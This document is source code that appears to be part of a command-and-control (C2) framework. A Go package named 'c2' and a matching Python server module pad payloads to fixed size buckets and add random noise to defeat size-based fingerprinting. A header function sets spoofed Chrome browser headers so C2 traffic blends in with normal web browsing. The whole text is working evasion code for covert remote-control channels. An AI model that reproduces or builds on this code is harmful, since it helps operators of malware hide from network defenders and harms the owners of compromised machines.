File: pkg/c2/traffic_shape.go
package c2

import (
	"crypto/rand"
	"encoding/binary"
	"fmt"
	"math"
	"net/http"
)

// PayloadSizeBuckets defines common payload sizes used for traffic shaping.
// Payloads are padded to the nearest bucket to prevent size-based fingerprinting.
var PayloadSizeBuckets = []int{512, 1024, 2048, 4096, 8192}

// ShapePayload pads data to the nearest size bucket with a 4-byte big-endian
// length prefix so the original data can be recovered by UnshapePayload.
// If targetSize is 0, the data is padded to the nearest bucket that fits
// the length header + data. Padding bytes are cryptographically random.
func ShapePayload(data []byte, targetSize int) ([]byte, error) {
	if len(data) > math.MaxUint32 {
		return nil, fmt.Errorf("payload exceeds 4 GiB length prefix limit")
	}
	if targetSize <= 0 {
		targetSize = nearestBucket(len(data) + 4) // +4 for length header
	}
	if targetSize < len(data)+4 {
		targetSize = len(data) + 4
	}

	padded := make([]byte, targetSize)
	binary.BigEndian.PutUint32(padded[:4], uint32(len(data)))
	copy(padded[4:], data)
	if len(data)+4 < targetSize {
		rand.Read(padded[4+len(data):]) //nolint:errcheck // crypto/rand.Read does not fail on Linux
	}
	return padded, nil
}

// UnshapePayload extracts the original data from a ShapePayload output
// by reading the 4-byte big-endian length prefix.
func UnshapePayload(data []byte) ([]byte, error) {
	if len(data) < 4 {
		return nil, fmt.Errorf("data too short for shape header")
	}
	origLen := binary.BigEndian.Uint32(data[:4])
	if int(origLen) > len(data)-4 {
		return nil, fmt.Errorf("invalid shape header length")
	}
	return data[4 : 4+origLen], nil
}

// AddNoise prepends a 4-byte big-endian length header and appends a random
// amount of random padding (16-256 bytes) to data. The length header allows
// StripNoise to recover the original data.
func AddNoise(data []byte) ([]byte, error) {
	if len(data) > math.MaxUint32 {
		return nil, fmt.Errorf("payload exceeds 4 GiB length prefix limit")
	}
	// Generate a random padding length between 16 and 256 bytes.
	paddingLen := 16 + CryptoRandIntn(241) // 16..256

	noise := make([]byte, paddingLen)
	rand.Read(noise) //nolint:errcheck

	result := make([]byte, 4+len(data)+paddingLen)
	binary.BigEndian.PutUint32(result[:4], uint32(len(data)))
	copy(result[4:], data)
	copy(result[4+len(data):], noise)
	return result, nil
}

// StripNoise removes the noise padding added by AddNoise by reading the
// 4-byte big-endian length prefix.
func StripNoise(data []byte) ([]byte, error) {
	if len(data) < 4 {
		return nil, fmt.Errorf("data too short for noise header")
	}
	origLen := binary.BigEndian.Uint32(data[:4])
	if int(origLen) > len(data)-4 {
		return nil, fmt.Errorf("invalid noise header length")
	}
	return data[4 : 4+origLen], nil
}

// MimicBrowserHeaders sets realistic browser headers on an HTTP request
// to make C2 traffic blend in with normal web browsing activity.
func MimicBrowserHeaders(req *http.Request) {
	req.Header.Set("User-Agent",
		"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
	req.Header.Set("Accept",
		"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
	req.Header.Set("Accept-Language",
		"en-US,en;q=0.9")
	req.Header.Set("Accept-Encoding",
		"identity")
	req.Header.Set("Connection",
		"keep-alive")
	req.Header.Set("Upgrade-Insecure-Requests",
		"1")
	req.Header.Set("Sec-Fetch-Dest",
		"document")
	req.Header.Set("Sec-Fetch-Mode",
		"navigate")
	req.Header.Set("Sec-Fetch-Site",
		"none")
	req.Header.Set("Sec-Fetch-User",
		"?1")
	req.Header.Set("Cache-Control",
		"max-age=0")
}

// nearestBucket returns the smallest bucket size that is >= dataLen.
// If dataLen exceeds all buckets, it rounds up to the next multiple
// of the largest bucket to maintain traffic shaping for large payloads.
func nearestBucket(dataLen int) int {
	for _, size := range PayloadSizeBuckets {
		if dataLen <= size {
			return size
		}
	}
	largest := PayloadSizeBuckets[len(PayloadSizeBuckets)-1]
	return ((dataLen + largest - 1) / largest) * largest
}

File: c2server/crypto/traffic_shape.py
"""Traffic shaping utilities matching Go's traffic_shape.go exactly."""

from __future__ import annotations

import os
import secrets
import struct

# Mirrors Go: var PayloadSizeBuckets = []int{512, 1024, 2048, 4096, 8192}
BUCKETS: list[int] = [512, 1024, 2048, 4096, 8192]

_MAX_UINT32 = 0xFFFFFFFF
_HEADER_SIZE = 4  # 4-byte big-endian uint32 length prefix

# Noise padding range: 16..256 bytes (matches Go: 16 + int(lenBuf[0])%241)
_NOISE_MIN = 16
_NOISE_RANGE = 241  # exclusive upper bound for the modulo, giving max 256


def _nearest_bucket(data_len: int) -> int:
    """Return the smallest bucket >= data_len, or round up to next 8192 multiple.

    Mirrors Go nearestBucket().
    """
    for size in BUCKETS:
        if data_len <= size:
            return size
    largest = BUCKETS[-1]
    return ((data_len + largest - 1) // largest) * largest


def shape_payload(data: bytes) -> bytes:
    """Pad data to the nearest size bucket with a 4-byte BE length prefix.

    Format: uint32_BE(len(data)) || data || random_padding

    Mirrors Go ShapePayload(data, 0).

    Args:
        data: Payload to shape.

    Returns:
        Padded payload with length prefix.

    Raises:
        ValueError: If data exceeds 4 GiB.
    """
    if len(data) > _MAX_UINT32:
        raise ValueError("payload exceeds 4 GiB length prefix limit")

    target_size = _nearest_bucket(len(data) + _HEADER_SIZE)

    padded = bytearray(target_size)
    struct.pack_into(">I", padded, 0, len(data))
    padded[_HEADER_SIZE : _HEADER_SIZE + len(data)] = data
    pad_start = _HEADER_SIZE + len(data)
    if pad_start < target_size:
        padded[pad_start:] = os.urandom(target_size - pad_start)

    return bytes(padded)


def unshape_payload(data: bytes) -> bytes:
    """Extract original data from a shape_payload() output.

    Reads the 4-byte BE uint32 length prefix.

    Args:
        data: Shaped payload.

    Returns:
        Original data bytes.

    Raises:
        ValueError: If data is too short or the length header is invalid.
    """
    if len(data) < _HEADER_SIZE:
        raise ValueError("data too short for shape header")

    (orig_len,) = struct.unpack_from(">I", data, 0)
    if orig_len > len(data) - _HEADER_SIZE:
        raise ValueError("invalid shape header length")

    return data[_HEADER_SIZE : _HEADER_SIZE + orig_len]


def add_noise(data: bytes) -> bytes:
    """Prepend 4-byte BE length header and append 16-256 random padding bytes.

    Mirrors Go AddNoise().

    Format: uint32_BE(len(data)) || data || random_padding

    Args:
        data: Payload to add noise to.

    Returns:
        Noisy payload with length prefix.

    Raises:
        ValueError: If data exceeds 4 GiB.
    """
    if len(data) > _MAX_UINT32:
        raise ValueError("payload exceeds 4 GiB length prefix limit")

    # Unbiased random in [16, 256] — uses rejection sampling internally.
    # Go side uses cryptoRandIntn(241) which also avoids modular bias.
    padding_len = _NOISE_MIN + secrets.randbelow(_NOISE_RANGE)

    noise = os.urandom(padding_len)
    result = bytearray(_HEADER_SIZE + len(data) + padding_len)
    struct.pack_into(">I", result, 0, len(data))
    result[_HEADER_SIZE : _HEADER_SIZE + len(data)] = data
    result[_HEADER_SIZE + len(data) :] = noise

    return bytes(result)


def strip_noise(data: bytes) -> bytes:
    """Remove noise padding added by add_noise().

    Reads the 4-byte BE uint32 length prefix.

    Args:
        data: Noisy payload.

    Returns:
        Original data bytes.

    Raises:
        ValueError: If data is too short or the length header is invalid.
    """
    if len(data) < _HEADER_SIZE:
        raise ValueError("data too short for noise header")

    (orig_len,) = struct.unpack_from(">I", data, 0)
    if orig_len > len(data) - _HEADER_SIZE:
        raise ValueError("invalid noise header length")

    return data[_HEADER_SIZE : _HEADER_SIZE + orig_len]
